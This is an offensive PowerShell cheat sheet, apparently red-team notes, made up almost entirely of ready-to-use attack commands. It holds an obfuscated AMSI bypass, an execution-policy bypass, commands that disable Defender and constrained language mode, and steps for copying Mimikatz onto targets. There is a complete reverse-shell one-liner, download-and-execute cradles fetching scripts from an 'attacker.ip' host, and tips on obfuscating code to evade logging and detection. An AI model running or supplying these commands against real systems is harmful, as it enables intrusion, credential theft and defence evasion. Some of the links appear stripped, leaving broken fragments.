Offensive Powershell

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}
# If you are over C2 and cant get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername -Credential $cred -scriptblock {whoami}

AMSI Bypass

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Execution Policy

powershell -ep bypass



Checking Language Mode

When constrained can add the functions at end of script.
E.G: Putting "invoke-mimikatz" and the end of Invoke-Mimikatz.ps1 to call it since language wont let you.

Disabling Constrained Language Mode

Note: This only works if its set locally. Needs to be run as system and is two underscores.
# Check (4 = constrained, 8 = unconstrained)
# Change
setx __PSLockdownPolicy "8" /M

Applocker Policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Copy File to target

Copy-Item .\Invoke-Mimikatz.ps1 \\target.local\c$\'Program Files'
Copy-Item C:\file C:\Users\target\ -ToSession $sess
Copy-Item C:\Users\target\file C:\ -FromSession $sess

Reverse Shell Nishang

powershell.exe iex (iwr -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress -Port 443)
Might need to modify nishang script first so that the function name is correct.

Reverse Shell Listener

Import-Module .\powercat.ps1
powercat -l -v -p 443

Reverse Shell One Liner

$client = New-Object System.Net.Sockets.TCPClient("",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


powershell.exe iex (iwr http://attacker.ip/Script.ps1 -UseBasicParsing); script-function -arg1 -arg2
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://attacker.ip/Script.ps1'))

Ping Sweep

# Sweep computers in a /24 subnet
1..255 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}

Testing Ports

Test-NetConnection -ComputerName <name> -Port <port>
# Nishang
Invoke-PortScan -StartAddress <IP> -EndAddress <IP> [-PortScan] [-Port <>]


Obfuscation defeats script block logging, warning level auto logging and AMSI when done right. As a very simple example, we have already seen how GetField becomes GetFiel`d to bypass warning level auto logging. Invoke-Obfuscation and Invoke-CradleCrafter from Daniel ( are very useful for implementing obfuscation.
Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc. Revoke-Obfusction ( is one such tool for identifying obfuscated scripts from event logs. Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See: